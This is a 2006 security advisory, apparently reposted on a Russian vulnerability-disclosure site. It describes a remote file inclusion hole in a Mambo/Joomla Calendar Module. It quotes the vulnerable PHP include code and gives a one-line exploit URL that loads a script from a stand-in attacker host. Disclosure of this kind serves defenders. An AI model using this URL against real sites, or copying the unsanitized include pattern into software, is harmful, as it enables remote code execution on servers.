Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities

  [KurdishVanilla CMS <= 1.0.1 (RootDirectory)
Remote file inclusion Vuln.]

  [Kurdish Security # 14] MoSpray [base_dir] Remote Command Execution [ Mambo & Joomla]

  DotClear : Multiples Full Path Disclosure

From:matdhule_(at)_gmail.com <matdhule_(at)_gmail.com>
Date:24 июля 2006 г.
Subject:Calendar Module <= 1.5.7 Remote File Include Vulnerabilities

---------------------------------------------------------------------------------

Calendar Module <= 1.5.7 Remote File Include Vulnerabilities
---------------------------------------------------------------------------------


Author : Matdhule

Contact : [email protected]

Application : Calendar Module (com_calendar.php)

Version : 1.5.7

---------------------------------------------------------------------------------

Vulnerability:
In folder components we found vulnerability script com_calendar.php.

-----------------------com_calendar.php---------------------------------
<?php

//Configuration
include($absolute_path.'/components/calendar/cal_config.php');
if (!file_exists("language/calendar/".$lang."_calendar.
php") ) {
   die("Invalid Language");
} else {
   include($absolute_path.'/language/calendar/'.$lang.'_calendar.
php');
}

-------------------------------------------------------------------------

Variables $absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.
---------------------------------------------------------------------------------


Exploit :

http://[target]/[path]/components/com_calendar.php?absolute_path=http://attacker.com/evil.txt?

---------------------------------------------------------------------------------


Greetz : solpot, j4mbi_h4ck3r, h4ntu, the_day, phoux, bius, thama & all crews #mardongan, #e-c-h-o, #jambihackerlink @dalnet

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород